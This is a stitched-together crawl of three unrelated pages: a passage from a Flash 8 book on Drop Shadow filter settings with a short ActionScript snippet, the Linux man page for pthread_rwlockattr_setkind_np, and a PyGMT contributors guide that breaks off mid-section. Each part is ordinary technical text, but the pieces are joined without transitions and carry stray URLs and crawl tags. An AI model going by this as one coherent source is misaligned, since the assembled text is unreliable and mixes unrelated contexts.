[bookmark: 205][bookmark: ch03fig166E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-16: Drop Shadow with Knockout deselected
[bookmark: 206][bookmark: ch03fig176E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-17: Drop Shadow with Knockout selected
[bookmark: 207][bookmark: N77566E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 208][bookmark: ch03lev3sec86E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Inner Shadow
The Inner Shadow
property is used to create a cutout of the source object being applied
and then place the drop shadow inside of the object. You can clearly
see the effect in Figures 3-18 and 3-19.
[bookmark: 209][bookmark: ch03fig186E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-18: Drop Shadow with Inner Shadow deselected
[bookmark: 210][bookmark: ch03fig196E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-19: Drop Shadow with Inner Shadow selected
[bookmark: 211][bookmark: ch03lev3sec96E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Hide Object
The final available property for Drop Shadow is Hide Object,
which is used to completely keep the original object from being
rendered to screen and, instead, only shows the final Drop Shadow
filter effect. You'll see some examples in Figures 3-20 and 3-21.
[bookmark: 212][bookmark: ch03fig206E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-20: Drop Shadow with original settings
[bookmark: 213][bookmark: ch03fig216E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 3-21: Drop Shadow with Hide Object selected
As you can see, there is a vast range of visual options
for you to choose from when using the Drop Shadow filter. Spend some
time experimenting with all the properties and finding combinations
that you like. Before we move on to the Blur filter though, as
promised, let's prove that all of these funky new effects can be
applied to text dynamically, using ActionScript.
[bookmark: 214][bookmark: N78746E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Modifying the Dynamic Text[bookmark: 215][bookmark: N78766E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[image: Image from book]
Create a button on the stage, above your dynamicText field from earlier, and give it an instance name my_btn.
Create a new layer in the timeline, click on the first frame, and then enter the following code:
// Create an array of 3 phrases
var words:Array = ["Flash 8 Rocks!","Who would have thought!",
"OMG Dynamic Drop Shadows"];
// Attach code to the button
my_btn.onPress=function(){
// Choose a random number from 0 to the number of elements
// in the array. | https://pl.b-ok.org/book/486542/185337 | CC-MAIN-2019-26 | en | refinedweb |
PTHREAD_RWLOCKATTR_SETKIND_NP(3)y Functions ManualD_RWLOCKATTR_SETKIND_NP(3)
pthread_rwlockattr_setkind_np, pthread_rwlockattr_getkind_np - set/get the read-write lock kind of the thread read-write lock attribute object
#include <pthread.h> int pthread_rwlockattr_setkind_np(pthread_rwlockattr_t *attr, int pref); int pthread_rwlockattr_getkind_np(const pthread_rwlockattr_t *attr, int *pref); Compile and link with -pthread. Feature Test Macro Requirements for glibc (see feature_test_macros(7)): pthread_rwlockattr_setkind_np(), pthread_rwlockattr_getkind_np(): _XOPEN_SOURCE >= 500 || _POSIX_C_SOURCE >= 200809L
The pthread_rwlockattr_setkind_np() function sets the "lock kind" attribute of the read-write lock attribute object referred to by attr to the value specified in pref. The argument pref may be set to one of the following: PTHREAD_RWLOCK_PREFER_READER_NP This is the default. A thread may hold multiple read locks; that is, read locks are recursive. According to The Single Unix Specification, the behavior is unspecified when a reader tries to place a lock, and there is no write lock but writers are waiting. Giving preference to the reader, as is set by PTHREAD_RWLOCK_PREFER_READER_NP, implies that the reader will receive the requested lock, even if a writer is waiting. As long as there are readers, the writer will be starved. PTHREAD_RWLOCK_PREFER_WRITER_NP This is intended as the write lock analog of PTHREAD_RWLOCK_PREFER_READER_NP. This is ignored by glibc because the POSIX requirement to support recursive writer locks would cause this option to create trivial deadlocks; instead use PTHREAD_RWLOCK_PREFER_WRITER_NONRECURSIVE_NP which ensures the application developer will not take recursive read locks thus avoiding deadlocks. PTHREAD_RWLOCK_PREFER_WRITER_NONRECURSIVE_NP Setting the lock kind to this avoids writer starvation as long as any read locking is not done in a recursive fashion. The pthread_rwlockattr_getkind_np() function returns the value of the lock kind attribute of the read-write lock attribute object referred to by attr in the pointer pref.
On success, these functions return 0. Given valid pointer arguments, pthread_rwlockattr_getkind_np() always succeeds. On error, pthread_rwlockattr_setkind_np() returns a nonzero error number.
EINVAL pref specifies an unsupported value.
The pthread_rwlockattr_getkind_np() and pthread_rwlockattr_setkind_np() functions first appeared in glibc 2.1.
These functions are non-standard GNU extensions; hence the suffix "_np" (nonportable) in the names.
pthreads(7)
This page is part of release 5.01 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. Linux Programmer's Manual 2019-03-06 PTHREAD_RWLOCKATTR_SETKIND_NP(3)
Pages that refer to this page: pthreads(7) | http://man7.org/linux/man-pages/man3/pthread_rwlockattr_setkind_np.3.html | CC-MAIN-2019-26 | en | refinedweb |
Upgrade your existing Service Bus standard namespaces to premium in-place
Posted on 02 April 2019
Our new migration tool is now available. Use it to upgrade existing multi-tenant Service Bus standard namespace to dedicated premium namespaces, with no change in configuration. The existing connection string is made an alias that, after migration, points to the premium namespaces.
Switch to premium to enable enterprise capabilities, such as:
- Virtual network injection.
- IP filtering/firewalls.
- Availability zones.
Geo-disaster recovery. | https://azure.microsoft.com/en-in/updates/upgrade-your-existing-service-bus-standard-namespaces-to-premium-in-place/ | CC-MAIN-2019-26 | en | refinedweb |
Net
Peer
Net Tcp Binding Peer
Net Tcp Binding Peer
Net Tcp Binding Peer
Class
Tcp Binding
Definition
Warning
This API is now obsolete.
Provides a secure binding for peer-to-peer network applications.
public ref class NetPeerTcpBinding : System::ServiceModel::Channels::Binding, System::ServiceModel::Channels::IBindingRuntimePreferences
[System.Obsolete("PeerChannel feature is obsolete and will be removed in the future.", false)] public class NetPeerTcpBinding : System.ServiceModel.Channels.Binding, System.ServiceModel.Channels.IBindingRuntimePreferences
type NetPeerTcpBinding = class inherit Binding interface IBindingRuntimePreferences
Public Class NetPeerTcpBinding Inherits Binding Implements IBindingRuntimePreferences
- Inheritance
-
- Attributes
-
- Implements
-
Remarks. | https://docs.microsoft.com/en-us/dotnet/api/system.servicemodel.netpeertcpbinding?redirectedfrom=MSDN&view=netframework-4.8 | CC-MAIN-2019-26 | en | refinedweb |
Definitions for supported audio routing configurations.
The audio manager maintains the audio routing logic based on registered audio sources. This file defines routing properties and provides functions for them. The following are examples of using audio routing.
This example shows how to get an audio handle and set its type for a libasound channel. The example is for playback, but the audio manager specific steps are the same for recording. The example acquires an audio manager handle of type AUDIO_TYPE_ALERT, and sets it to become active only when PCM audio is actually playing (this is done via the suspended flag). The audio manager handle is bound to a libasound PCM handle, and freed when the program ends.
#include <audio/audio_manager_routing.h> #include <sys/asoundlib.h> void main(void) { unsigned int audioman_handle; snd_pcm_t *pcm_handle; // Acquire an audioman handle. Start it "suspended", which means that its // ducking and routing rules only become active when the PCM channel is // actually playing. if ( audio_manager_get_handle ( AUDIO_TYPE_ALERT, // Audio Type 0, // pid that owns handle. 0 = this process true, // Start "suspended" &audioman_handle ) < 0 ) { printf("Could not get an audioman handle of the requested type\n"); return; } // Acquire a pcm channel from libasound for playback snd_pcm_open ( &pcm_handle, "/dev/snd/pcmPreferred", SND_PCM_OPEN_PLAYBACK ); // Bind the pcm_handle with the audioman handle. if ( snd_pcm_set_audioman_handle( pcm_handle, audioman_handle ) < 0 ) { printf("Could not set the pcm_handle with the audioman_handle\n"); } // Do what you would normally do here with libasound... // ... // Cleanup snd_pcm_close( pcm_handle ); audio_manager_free_handle( audioman_handle ); }
The audio type AUDIO_TYPE_ALERT, when active, will follow the routing of other active audio because it is lowest priority in the routing table. If nothing else is playing, it will force routing to be through the loud speaker, regardless of what other devices are connected.
For concurrency, if there is an AUDIO_TYPE_DEFAULT playing concurrently (which is the case for any stream that does not explicitly use the audio manager), when the AUDIO_TYPE_ALERT becomes active, it will cause the AUDIO_TYPE_DEFAULT stream to become attenuated.
Alernatively, you can use utility functions in audio_manager_routing.h to implicitly handle the setup in one call. Note that the audioman_handle starts up suspended:
#include <audio/audio_manager_routing.h> #include <sys/libasound.h> void main(void) { unsigned int audioman_handle; snd_pcm_t *pcm_handle; if (audio_manager_snd_pcm_open_name( AUDIO_TYPE_ALERT, &pcm_handle, &audioman_handle, "/dev/snd/pcmPreferred", SND_PCM_OPEN_PLAYBACK ) < 0 ) { printf("Failed to open an audioman pcm channel\n"); return; } // Do what you would normally do with libasound... // ... // Cleanup snd_pcm_close( pcm_handle ); audio_manager_free_handle( audioman_handle ); }
This example shows how to set the audio type for an mm-renderer application. The code that follows sets the audio type of the mm-renderer context to AUDIO_TYPE_ALERT. Currently, the "audio_type" output parameter); // Set audio type by setting "audio_type" when calling mmr_output_parameters() strm_dict_t* dict = strm_dict_new(); dict = strm_dict_set( dict, "audio_type", audio_manager_get_name_from_type(AUDIO_TYPE_ALERT)); mmr_output_parameters( context, output_id, dict ); // // Attach input here // // Play audio mmr_play( context ); // .... // // Cleanup // strm_dict_destroy( dict ); mmr_context_destroy(context); mmr_disconnect(connection); }
There may be times when an application needs to do some advanced routing. For example, an application may want to do its own custom audio routing, instead of using the default audio routing provided by audio manager. In that case, an application may request a handle from audio manager and then pass this handle to mm-renderer. This way, the mm-renderer context is bound to the audio manager handle.
Your application can pass the audio manager handle to mm-renderer by calling the function mmr_output_parameters() and specifying "audioman_handle". Note that setting "audioman_handle" parameter); // Get an audio manager handle from Audio Manager handle and then convert it to a string // so that it can be passed to mm-renderer. // This call will activate audio manager handle immediately (notice the suspended parameter is // set to false). uint32_t audioman_handle; audio_manager_get_handle(AUDIO_TYPE_DEFAULT, getpid(), false, &audioman_handle); char audioman_handle_str[15]; itoa(audioman_handle, audioman_handle_str, 10); // Set audio manager handle by setting "audioman_handle" when calling mmr_output_parameters() strm_dict_t* dict = strm_dict_new(); dict = strm_dict_set( dict, "audioman_handle", audioman_handle_str); mmr_output_parameters( context, output_id, dict ); // // Attach input here // // Play audio mmr_play( context ); // .... // // Cleanup // strm_dict_destroy( dict ); mmr_context_destroy(context); mmr_disconnect(connection); }
This example shows how to override the default routing for an audio type. In this example, because we are not actually binding a libasound pcm handle to the audioman handle, we start the audioman handle as not suspended so that the routing and concurrency policy changes take effect right away. This will force the output routing to speaker, and leave the input routing up to the default routing table. The routing override is in effect as long as the audioman_handle's type is the highest priority routing type currently active. Note that if there are multiple handles of the same type active at the same time, then it is a last-one-wins policy.
#include <audio/audio_manager_routing.h> void main(void) { unsigned int audioman_handle; // Acquire an audioman handle. Start it "unsuspended", which means that its // ducking and routing rules take effect immediately. if (audio_manager_get_handle(AUDIO_TYPE_DEFAULT, // Type default 0, // This pid false, // Start "unsuspended" &audioman_handle) == EOK) { // Use audio_manager_set_handle_type to also override the routing paths if (audio_manager_set_handle_type(audioman_handle, // audioman handle AUDIO_TYPE_DEFAULT, // Use the same type AUDIO_DEVICE_SPEAKER, // Force routing to loud speaker for output AUDIO_DEVICE_DEFAULT ) == EOK) { // No preference for the input routing. // Do what you would normally do here with libasound... // ... } audio_manager_free_handle(audioman_handle); } else { // Handle error as desired. // You may want to proceed with what you would normally do here // with libasound... // ... } } | http://www.qnx.com/developers/docs/6.6.0.update/com.qnx.doc.audiomanager.lib_ref/topic/manual/about_audio__manager__routing_8h.html | CC-MAIN-2019-26 | en | refinedweb |
If you are an advanced user of drawRect on your ipop*, you will know that of course drawRect will not actually run until "all processing is finished." setNeedsDisplay flags a view as invalidated and the OS, in a word, waits until all processing is done. This can be infuriating in the common situation where you want to have:
- a view controller 1
- starts some function 2
- which incrementally 3
- creates a more and more complicated artwork and 4
- at each step, you setNeedsDisplay (wrong!) 5
- until all the work is done 6
Of course, when you do that, all that happens is that drawRect is run once only after step 6. What you want is for the ^&£@%$@ view to be refreshed at point 5. This can lead to you smashing your ipops on the floor, scanning Stackoverflow for hours, screaming at the kids more than necessary about the dangers of crossing the street, etc etc. What to do?
Footnotes:
* ipop: i Pad Or Phone !
Solution to the original question..............................................
In a word, you can (A) background the large painting, and call to the foreground for UI updates or (B) arguably controversially there are four 'immediate' methods suggested that do not use a background process. For the result of what works, run the demo program. It has #defines for all five methods.
Truly astounding alternate solution introduced by Tom Swift..................
Tom Swift has explained the amazing idea of quite simply manipulating the run loop. Here's how you trigger the run loop:
[[NSRunLoop currentRunLoop] runMode: NSDefaultRunLoopMode beforeDate: [NSDate date]];
This is a truly amazing piece of engineering. Of course one should be extremely careful when manipulating the run loop and as many pointed out this approach is strictly for experts.
The Bizarre Problem That Arises..............................................
Even though a number of the methods work, they don't actually "work" because there is a bizarre progressive-slow-down artifact you will see clearly in the demo.
Scroll to the 'answer' I pasted in below, showing the console output - you can see how it progressively slows.
Here's the new SO question:
Mysterious "progressive slowing" problem in run loop / drawRect.
Here is V2 of the demo app...
You will see it tests all five methods,
#ifdef TOMSWIFTMETHOD [self setNeedsDisplay]; [[NSRunLoop currentRunLoop] runMode:NSDefaultRunLoopMode beforeDate:[NSDate date]]; #endif #ifdef HOTPAW [self setNeedsDisplay]; [CATransaction flush]; #endif #ifdef LLOYDMETHOD [CATransaction begin]; [self setNeedsDisplay]; [CATransaction commit]; #endif #ifdef DDLONG [self setNeedsDisplay]; [[self layer] displayIfNeeded]; #endif #ifdef BACKGROUNDMETHOD // here, the painting is being done in the bg, we have been // called here in the foreground to inval [self setNeedsDisplay]; #endif
You can see for yourself which methods work and which do not.
you can see the bizarre "progressive-slow-down". why does it happen?
you can see with the controversial TOMSWIFT method, there is actually no problem at all with responsiveness. tap for response at any time. (but still the bizarre "progressive-slow-down" problem)
So the overwhelming thing is this weird "progressive-slow-down": on each iteration, for unknown reasons, the time taken for a loop deceases. Note that this applies to both doing it "properly" (background look) or using one of the 'immediate' methods.
Practical solutions ........................
For anyone reading in the future, if you are actually unable to get this to work in production code because of the "mystery progressive slowdown" ... Felz and Void have each presented astounding solutions in the other specific question, hope it helps. | https://blog.csdn.net/dqjyong/article/details/17204991 | CC-MAIN-2019-26 | en | refinedweb |
#include <wx/mstream.h>
This class allows using all methods taking a wxInputStream reference to read in-memory data.
Example:
Initializes a new read-only memory stream which will use the specified buffer data of length len.
The stream does not take ownership of the buffer, i.e. the buffer will not be deleted in its destructor.
Creates a new read-only memory stream, initializing it with the data from the given output stream stream.
Creates a new read-only memory stream, initializing it with the data from the given input stream stream.
The len argument specifies the amount of data to read from the stream. Setting it to wxInvalidOffset means that the stream is to be read entirely (i.e. till the EOF is reached).
Destructor.
Does NOT free the buffer provided in the ctor.
Returns the pointer to the stream object used as an internal buffer for that stream. | https://docs.wxwidgets.org/trunk/classwx_memory_input_stream.html | CC-MAIN-2019-26 | en | refinedweb |
Hi* > I wonder if suggesting FFBE_32 and av_bswap_32 everywhere has much of a > chance. i definitly want these to be available to the outside of libav so if we dont find another solution then iam fine with these but it really would be nicer if a user app could use BE_32 instead of FFBE_32 maybe some #ifdef AV_NO_PREFIXES #define BE_32 FFBE_32 ... #endif in libavutil or similar could be | http://ffmpeg.org/pipermail/ffmpeg-cvslog/2006-December/001802.html | CC-MAIN-2022-27 | en | refinedweb |
Add digital signature or digitally sign PDF in C#
Aspose.PDF for .NET supports the feature to digitally sign the PDF files using the SignatureField class. You can also certify a PDF file with a PKCS12-Certificate. Something similar to Adding Signatures and Security in Adobe Acrobat..
In other words, the document would still be considered to retain its integrity and the recipient could still trust the document. For further details, please visit Certifying and signing a PDF. In general, certifying a document can be compared to Code-signing a .NET executable.
Aspose.PDF for .NET signing features
We can use follwing classed and method for PDF signing
- Class DocMDPSignature
- Enumeration DocMDPAccessPermissions
- Property IsCertified in PdfFileSignature class
Sign PDF with digital signatures
public static void SignDocument() { string inFile = System.IO.Path.Combine(_dataDir,"DigitallySign.pdf"); string outFile = System.IO.Path.Combine(_dataDir,"DigitallySign_out.pdf"); using (Document document = new Document(inFile)) { using (PdfFileSignature signature = new PdfFileSignature(document)) { PKCS7 pkcs = new PKCS7(@"C:\Keys\test.pfx", "Pa$$w0rd2020"); // Use PKCS7/PKCS7Detached objects signature.Sign(1, true, new System.Drawing.Rectangle(300, 100, 400, 200),pkcs); // Save output PDF file signature.Save(outFile); } } }
Add timestamp to digital signature
How to digitally sign a PDF with timestamp
Aspose.PDF for .NET supports to digitally sign the PDF with a timestamp server or Web service.
In order to accomplish this requirement, the TimestampSettings class has been added to the Aspose.PDF namespace. Please take a look at the following code snippet which obtains timestamp and adds it to PDF document:
public static void SignWithTimeStampServer() { using (Document document = new Document(System.IO.Path.Combine(_dataDir,"SimpleResume.pdf"))) { using (PdfFileSignature signature = new PdfFileSignature(document)) { PKCS7 pkcs = new PKCS7(@"C:\Keys\test.pfx", "Start2020"); TimestampSettings timestampSettings = new TimestampSettings("", string.Empty); // User/Password can be omitted pkcs.TimestampSettings = timestampSettings; System.Drawing.Rectangle rect = new System.Drawing.Rectangle(100, 100, 200, 100); // Create any of the three signature types signature.Sign(1, "Signature Reason", "Contact", "Location", true, rect, pkcs); // Save output PDF file signature.Save(System.IO.Path.Combine(_dataDir, "DigitallySignWithTimeStamp_out.pdf")); } } } | https://docs.aspose.com/pdf/net/digitally-sign-pdf-file/ | CC-MAIN-2022-27 | en | refinedweb |
conan export-pkg¶
$ conan export-pkg [-h] [-bf BUILD_FOLDER] [-f] [-if INSTALL_FOLDER] [-pf PACKAGE_FOLDER] [-sf SOURCE_FOLDER] [-j JSON] [-l [LOCKFILE]] [--ignore-dirty] [-e ENV_HOST] [-e:b ENV_BUILD] [-e:h ENV_HOST] [-o OPTIONS_HOST] [-o:b OPTIONS_BUILD] [-o:h OPTIONS_HOST] [-pr PROFILE_HOST] [-pr:b PROFILE_BUILD] [-pr:h PROFILE_HOST] [-s SETTINGS_HOST] [-s:b SETTINGS_BUILD] [-s:h SETTINGS_HOST] path [reference]
Exports a recipe, then creates a package from local source and build folders.
If ‘–package-folder’ is provided it will copy the files from there, otherwise, it will execute package() method over ‘–source-folder’ and ‘–build-folder’ to create the binary package.
positional arguments: path Path to a folder containing a conanfile.py or to a recipe file e.g., my_folder/conanfile.py reference user/channel or pkg/version@user/channel (if name and version are not declared in the conanfile.py) optional arguments: -h, --help show this help message and exit -bf BUILD_FOLDER, --build-folder BUILD_FOLDER Directory for the build process. Defaulted to the current directory. A relative path to the current directory can also be specified -f, --force Overwrite existing package if existing -if INSTALL_FOLDER, --install-folder INSTALL_FOLDER Directory containing the conaninfo.txt and conanbuildinfo.txt files (from previous 'conan install'). Defaulted to --build-folder If these files are found in the specified folder and any of '-e', '-o', '-pr' or '-s' arguments are used, it will raise an error. -pf PACKAGE_FOLDER, --package-folder PACKAGE_FOLDER folder containing a locally created package. If a value is given, it won't call the recipe 'package()' method, and will run a copy of the provided folder. -sf SOURCE_FOLDER, --source-folder SOURCE_FOLDER Directory containing the sources. Defaulted to the conanfile's directory. A relative path to the current directory can also be specified -j JSON, --json JSON Path to a json file where the install information will be written
The export-pkg command let you create a package from already existing files in your working folder, it can be useful if you are using a build process external to Conan and do not want to provide it with the recipe. Nevertheless, you should take into account that it will generate a package and Conan won’t be able to guarantee its reproducibility or regenerate it again. This is not the normal or recommended flow for creating Conan packages.
Execution of this command will result in several files copied to the package
folder in the cache identified by its
package_id (Conan will perform all the
required actions to compute this _id_: build the graph, evaluate the requirements and
options, and call any required method), but there could be two
different sources for the files:
- If the argument
--package-folderis provided, Conan will just copy all the contents of that folder to the package one in the cache.
- If no
--package-folderis given, Conan will execute the method
package()once and the
self.copy(...)functions will copy matching files from the
source_folderand
build_folderto the corresponding path in the Conan cache (working directory corresponds to the
build_folder).
- If the arguments
--package-folder,
`--build-folderor
--source-folderare declared, but the path is incorrect, export-pkg will raise an exception.
There are different scenarios where this command could look like useful:
- You are working locally on a package and you want to upload it to the cache to be able to consume it from other recipes. In this situation you can use the export-pkg command to copy the package to the cache, but you could also put the package in editable mode and avoid this extra step.
- You only have precompiled binaries available, then you can use the export-pkg to create the Conan package, or you can build a working recipe to download and package them. These scenarios are described in the documentation section How to package existing binaries.
Note
Note that if --profile, settings or options are not provided to export-pkg, the configuration will be extracted from the information stored after a previous conan install. That information might be incomplete in some edge cases, so we strongly recommend the usage of --profile or --settings, --options, etc.
Examples
Create a package from a directory containing the binaries for Windows/x86/Release:
We need to collect all the files from the local filesystem and tell Conan to compute the proper
package_idso its get associated with the correct settings and it works when consuming it.
If the files in the working folder are:
Release_x86/lib/libmycoollib.a Release_x86/lib/other.a Release_x86/include/mylib.h Release_x86/include/other.h
then, just run:
$ conan new hello/0.1 --bare # It creates a minimum recipe example $ conan export-pkg . hello/0.1@user/stable -s os=Windows -s arch=x86 -s build_type=Release --package-folder=Release_x86
This last command will copy all the contents from the
package-folderand create the package associated with the settings provided through the command line.
Create a package from a source and build folder:
The objective is to collect the files that will be part of the package from the source folder (include files) and from the build folder (libraries), so, if these are the files in the working folder:
sources/include/mylib.h sources/src/file.cpp build/lib/mylib.lib build/lib/mylib.tmp build/file.obj
we would need a slightly more complicated conanfile.py than in the previous example to select which files to copy, we need to change the patterns in the
package()method:
def package(self): self.copy("*.h", dst="include", src="include") self.copy("*.lib", dst="lib", keep_path=False)
Now, we can run Conan to create the package:
$ conan export-pkg . hello/0.1@user/stable -pr:host=myprofile --source-folder=sources --build-folder=build | https://docs.conan.io/en/1.31/reference/commands/creator/export-pkg.html | CC-MAIN-2022-27 | en | refinedweb |
On Fri, Jan 13, 2017 at 10:04:34AM -0500, Sam Hartman wrote: > >>>>> "Josh" == Josh Triplett <josh@joshtriplett.org> writes: > > Josh> As another technical alternative, which I haven't seen > Josh> mentioned elsewhere in this thread or related bug reports: > Josh> when I need to override a packaged binary or file temporarily > Josh> for debugging purposes, without forgetting to restore it > Josh> later, I tend to use "mount --bind /my/replacement > Josh> /usr/bin/foo". For instance, for local testing while > Josh> developing dh-cargo, which required a newer version of Cargo > Josh> than packaged in Debian at the time, I built a local version > Josh> of Cargo and did "mount --bind ~/src/cargo/target/debug/cargo > Josh> /usr/bin/cargo". That allowed me to easily test-build > Josh> packages before the availability of a Debian package of a > Josh> sufficiently new Cargo. > > O, cool, that's really need. > > And as a throw-back to an alternate Plan9 history, you could presumably > unshare your mount namespace and even do that for a subset of the > processes on a system, getting almost all the benefits of PATH. Yes. Years ago, when Debian transitioned /bin/sh from bash to dash, Marco d'Itri posted a sample workaround for any scripts assuming bash, which involved unsharing the mount namespace, bind-mounting /bin/bash over /bin/sh, and then exec'ing a program. | https://lists.debian.org/debian-ctte/2017/01/msg00035.html | CC-MAIN-2022-27 | en | refinedweb |
First solution in Uncategorized category for Say Hi by ppitek40
# 1. on CheckiO your solution should be a function
# 2. the function should return the right answer, not print it.
def say_hi(name, age):
siedem = "Hi. My name is " + name + " and I'm " + str(age) + " years old"
return siedem. 9, 2017
Forum
Price
For Teachers
Global Activity
ClassRoom Manager
Leaderboard
Jobs
Coding games
Python programming for beginners | https://py.checkio.org/mission/say-history/publications/ppitek40/python-3/first/share/712f0efa56c15bdda824237ff4da6ceb/ | CC-MAIN-2022-27 | en | refinedweb |
Dear all,
I would like to write my user class (created in C++ with dictionary generated) as TTree Branch in pyroot.
My user class is named ‘Source’ and inherits from another user class (inheriting from TNamed). The class is defined inside a user namespace (e.g. ‘MyLib’).
In C++ I am able to write the class to TTree (and reading it afterwards) using these sample code:
//Init source= nullptr; f= new TFile("out.root","RECREATE"); tree= new TTree("tree","tree"); tree->Branch("Source",&source); //Create object and fill tree s1= new MyLib::Source() //set object parameters here //... source= s1; tree->Fill() //Write tree to file f->cd() tree->Write() f->Close()
In python I am doing the following:
## Load modules # - ROOT import ROOT from ROOT import gSystem, TFile, TTree, gROOT, AddressOf # - My library gSystem.Load('libMyLib') from ROOT import MyLib ## Init f= ROOT.TFile('test.root','RECREATE') tree= ROOT.TTree('tree','tree') source= MyLib.Source() tree.Branch('Source',source) ## Create object and fill tree s1= MyLib.Source() //Set parameters here s1.Id= 1 s1.Name= 's1' //... source= s1 source.Print() ## Here I print correctly the object attributes set before tree.Fill() ## Write file f.cd() tree.Write() f.Close()
The object is written to tree and accessible in file, but when I try to browse it (tree->Show(0)) the object parameters written are those initialized in the constructor (dummy values) and NOT those set at runtime (e.g. Id=1, Name=“s1”, etc).
For sure I am missing something trivial in python here (e.g. references).
For example copying s1 to source seems to work:
s1.Copy(source) # instead of source=s1
Could you in case help me to understand the problem and suggest the correct approach?
Thank you very much for your help,
Simone | https://root-forum.cern.ch/t/pyroot-troubles-writing-user-class-to-ttree/26251 | CC-MAIN-2022-27 | en | refinedweb |
an addon that basically is able to convert CSV files into Jsons or Dictionaries. It used to work well with the scripting mode set to "classic", however this option is no longer available, and my app throws an error when executing and ceses to function.
I'm using papaparse in order to convert CVS files, and I'm not able to import the "Papa" object into the "expresions.js" file where I have the code that construct 3 executes at runtime. With the "classic" scripting mode I could simply use the object, but now it throws an error since it is "undefined". The following snapshot will give you a glance at how the plugin is setup and what my code looks like, as well as the error that it produces:
What I tried first is importing the module using the following statement in the "expresion.js" file, right below the "use strict" directive:
import * as Papa from '../lib/papaparse.min.js
import * as Papa from '../lib/papaparse.min.js
Sadly, an error is thrown indicated that the module can't be loaded. I'm gessing that the path is no longer correct once contruct exports the addon and is using it on runtime.
The file is included in the "addon.json" file's "file-list", and is also indicated as a dependency in the plugin.js file:
this._info.AddFileDependency({
filename: "lib/papaparse.min.js",
type: "external-runtime-script"
});
this._info.AddFileDependency({
filename: "lib/papaparse.min.js",
type: "external-runtime-script"
});
- How should I import a module with the new scripting system, if not the way I'm doing it nor what I tried to do already?
- Could you point me to an addon that is using a library in a similar way, so I can figure it out through reverse enginiering?
Thank you very much, I look forward to your answers!
Develop games in your browser. Powerful, performant & highly capable.
I would guess you just need to access any global variables via globalThis, as described by our guide on changes for modules.
globalThis
Thank you for your answer Ashley, I was able to solve the problem thanks to it. I'm now going to elaborate a bit on what I had to do exactly, in case anyone else runs into a similar problem, but before that I'd like to take this chance to tell you that I love Construct, congratulations on a great game engine!
Contrary to what I believed, the error wasn't produced by the piece of code I took the screenshot of (expressions.js). It was produced by the "papaparse.js" library!
It was the "root" parameter that was undefined, I simply had to substitute it by "globalThis", as Ashley indicated, and do the same to access the "Papa" object from
"expressions.js":
:
I am by no means a javascript expert (just a junior coder in SngularStudios with a C++ background), but after doing a bit of research, the piece of code I had to modify looks like a UMD (Universal Module Definition).
Would it be possible for Construct to pass the "globalThis" object through the "root" parameter whenever this function is called? This would allow libraries using this standard to be imported into Construct without having to modify them.
Just an uninformed suggestion, please correct me if this is not possible
Thanks again! | https://www.construct.net/en/forum/construct-3/plugin-sdk-10/usage-importexport-within-161196 | CC-MAIN-2022-27 | en | refinedweb |
Get the priority of a given process
#include <sched.h> int getprio( pid_t pid );
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
The getprio() function returns the current priority of thread 1 in process pid. If pid is zero, the priority of the calling thread is returned.
The getprio() and setprio() functions are included in the QNX Neutrino libraries for porting QNX 4 applications. For new programs, use pthread_getschedparam(). | http://www.qnx.com/developers/docs/qnxcar2/topic/com.qnx.doc.neutrino.lib_ref/topic/g/getprio.html | CC-MAIN-2022-27 | en | refinedweb |
Contributors Guide
This is a community driven project and everyone is welcome to contribute.
The project is hosted at the PyGMT GitHub repository.
The goal is to maintain a diverse community that’s pleasant for everyone. Please be considerate and respectful of others. Everyone must abide by our Code of Conduct and we encourage all to read it carefully.
Ways to Contribute
Ways to Contribute Documentation and/or Code
Tackle any issue that you wish! Some issues are labeled as “good first issues” to indicate that they are beginner friendly, meaning that they don’t require extensive knowledge of the project.
Make a tutorial or gallery example of how to do something.
Improve the API documentation.
Contribute code! This can be code that you already have and it doesn’t need to be perfect! We will help you clean things up, test it, etc.
Ways to Contribute Feedback
Ways to Contribute to Community Building
Participate and answer questions on the PyGMT forum Q&A.
Participate in discussions at the quarterly PyGMT Community Meetings, which are announced on the forum governance page.
Cite PyGMT when using the project.
Spread the word about PyGMT or star the project!
Providing Feedback
Reporting a Bug
Find the Issues tab on the top of the GitHub repository and click New Issue.
Click on Get started next to Bug report.
Please try to fill out the template with as much detail as you can.
After submitting your bug report, try to answer any follow up questions about the bug as best as you can.
Reporting upstream bugs
If you are aware that a bug is caused by an upstream GMT issue rather than a PyGMT-specific issue, you can optionally take the following steps to help resolve the problem:
Add the line
pygmt.config(GMT_VERBOSE='d')after your import statements, which will report the equivalent GMT commands as one of the debug messages.
Either append all messages from running your script to your GitHub issue, or filter the messages to include only the GMT-equivalent commands using a command such as:
python <test>.py 2>&1 | awk -F': ' '$2=="GMT_Call_Command string" {print "gmt", $3}'
where
<test>is the name of your test script.
If the bug is produced when passing an in-memory data object (e.g., a pandas.DataFrame or xarray.DataArray) to a PyGMT function, try writing the data to a file (e.g., a NetCDF or ASCII txt file) and passing the data file to the PyGMT function instead. In the GitHub issue, please share the results for both cases along with your code.
Submitting a Feature Request
Submitting General Comments/Questions
There are several pages on the Community Forum where you can submit general comments and/or questions:
For questions about using PyGMT, select New Topic from the PyGMT Q&A Page.
For general comments, select New Topic from the Lounge Page.
To share your work, select New Topic from the Showcase Page.
General Guidelines
Resources for New Contributors
Please take a look at these resources to learn about Git and pull requests (don’t hesitate to ask questions):
Getting Help
Discussion often happens on GitHub issues and pull requests. In addition, there is a Discourse forum for the project where you can ask questions.
Pull Request Workflow
We follow the git pull request workflow to make changes to our codebase. Every change made goes through a pull request, even our own, so that our continuous integration services have a chance to check that the code is up to standards and passes all our tests. This way, the main branch is always stable.
General Guidelines for Making a Pull Request (PR):
What should be included in a PR
Have a quick look at the titles of all the existing issues first. If there is already an issue that matches your PR, leave a comment there to let us know what you plan to do. Otherwise, open an issue describing what you want to do.
